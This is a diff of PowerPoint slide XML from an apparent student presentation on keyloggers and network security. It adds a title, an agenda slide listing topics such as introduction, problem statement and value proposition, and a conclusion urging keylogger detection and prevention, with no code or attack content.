             <a:endParaRPr sz="1100">
               <a:latin typeface="Trebuchet MS"/>
@@ -2968,7 +4925,285 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="10" name="Picture 9">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE970094-A62D-37D9-72A0-46A1DA2DD3B9}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1295400" y="1828800"/>
+            <a:ext cx="3124200" cy="2895600"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="12" name="Picture 11">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{679A7745-59E8-6228-33A5-1F180E5B5DE0}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5586913" y="1657124"/>
+            <a:ext cx="5782482" cy="1619476"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="14" name="Picture 13">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{719363F9-43DB-2328-F649-AE8CD1ED230D}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId5"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5586913" y="4063654"/>
+            <a:ext cx="6095618" cy="1514475"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide15.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF7E6D72-9EC9-5F25-C805-ED61E0F1733C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1066800" y="762000"/>
+            <a:ext cx="3276600" cy="461665"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Conclusion:</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F67A9CF6-ABB3-1167-DF3B-D08BC8286444}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1066800" y="1223665"/>
+            <a:ext cx="8001000" cy="2585323"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="just"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>In today's digital landscape, keyloggers present a significant threat to network security, capable of capturing sensitive information and compromising data integrity. Addressing this threat requires a comprehensive and multi-faceted approach, encompassing advanced detection, robust prevention, and effective mitigation </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>strategies.Ultimately</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>, the continuous improvement of keylogger detection and network security measures is crucial for protecting sensitive information and maintaining the integrity of digital operations. By staying ahead of emerging threats and prioritizing user needs, we can ensure a safer and more secure digital environment for all.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="859430530"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide16.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="Picture 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1748D6B7-E5BE-3F6F-AF34-D670E90F646D}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="0" y="0"/>
+            <a:ext cx="12192000" cy="6858000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="901760298"/>
+      </p:ext>
+    </p:extLst>
   </p:cSld>
   <p:clrMapOvr>
     <a:masterClrMapping/>
@@ -2993,56 +5228,6 @@
           <a:chExt cx="0" cy="0"/>
         </a:xfrm>
       </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="object 2"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="12192000" cy="6858000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="12192000" h="6858000">
-                <a:moveTo>
-                  <a:pt x="12192000" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="0" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="6858000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="12192000" y="6858000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="12192000" y="0"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:solidFill>
-            <a:srgbClr val="F1F1F1"/>
-          </a:solidFill>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
       <p:grpSp>
         <p:nvGrpSpPr>
           <p:cNvPr id="3" name="object 3"/>
@@ -3711,8 +5896,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="739775" y="829627"/>
-            <a:ext cx="3909695" cy="678180"/>
+            <a:off x="409248" y="2439626"/>
+            <a:ext cx="9784080" cy="1978747"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3733,18 +5918,10 @@
               </a:spcBef>
             </a:pPr>
             <a:r>
-              <a:rPr sz="4250" spc="5" dirty="0"/>
-              <a:t>PROJECT</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="4250" spc="-85" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="4250" spc="25" dirty="0"/>
-              <a:t>TITLE</a:t>
-            </a:r>
-            <a:endParaRPr sz="4250"/>
+              <a:rPr lang="en-US" sz="4250" dirty="0"/>
+              <a:t>KEYLOGGER AND NETWORK SECURITY</a:t>
+            </a:r>
+            <a:endParaRPr sz="4250" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -3809,182 +5986,6 @@
       </p:grpSp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="21" name="object 21"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="739775" y="6473337"/>
-            <a:ext cx="1798955" cy="191770"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="6985" rIns="0" bIns="0" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="12700">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="55"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1100" spc="20" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>3/21/202</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" spc="10" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>4</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" spc="130" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="50" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>A</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="15" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>nnu</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="10" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>al</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="-140" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>R</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>e</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="90" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>v</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="-35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>e</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="15" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>w</a:t>
-            </a:r>
-            <a:endParaRPr sz="1100">
-              <a:latin typeface="Trebuchet MS"/>
-              <a:cs typeface="Trebuchet MS"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
           <p:cNvPr id="22" name="object 22"/>
           <p:cNvSpPr txBox="1">
             <a:spLocks noGrp="1"/>
@@ -4045,56 +6046,6 @@
           <a:chExt cx="0" cy="0"/>
         </a:xfrm>
       </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="object 2"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="12192000" cy="6858000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="12192000" h="6858000">
-                <a:moveTo>
-                  <a:pt x="12192000" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="0" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="6858000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="12192000" y="6858000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="12192000" y="0"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:solidFill>
-            <a:srgbClr val="F1F1F1"/>
-          </a:solidFill>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
       <p:grpSp>
         <p:nvGrpSpPr>
           <p:cNvPr id="3" name="object 3"/>
@@ -5228,6 +7179,518 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="23" name="TextBox 22">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1E16936-E7F8-BDF7-81C4-FF8F1A29B558}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1976501" y="1314108"/>
+            <a:ext cx="8709002" cy="6617196"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+                <a:ea typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t>Key Contents:</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="1200150" lvl="2" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t> Introduction to Keylogger</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="1200150" lvl="2" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t> Problem Statement</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="1200150" lvl="2" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t> Project Overview</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="1200150" lvl="2" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t> Who are the end users?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="1200150" lvl="2" indent="-285750">
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="25" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>S</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="10" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>o</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="25" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>lu</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-35" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>t</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-30" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="10" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>o</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>n</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-345" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-35" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>A</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-5" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>n</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>d</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="35" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-30" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>I</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-35" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>t</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>s</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="60" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-295" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>V</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-35" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>a</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="25" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>lu</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>e </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-15" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>P</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="-30" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>r</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2800" spc="10" dirty="0">
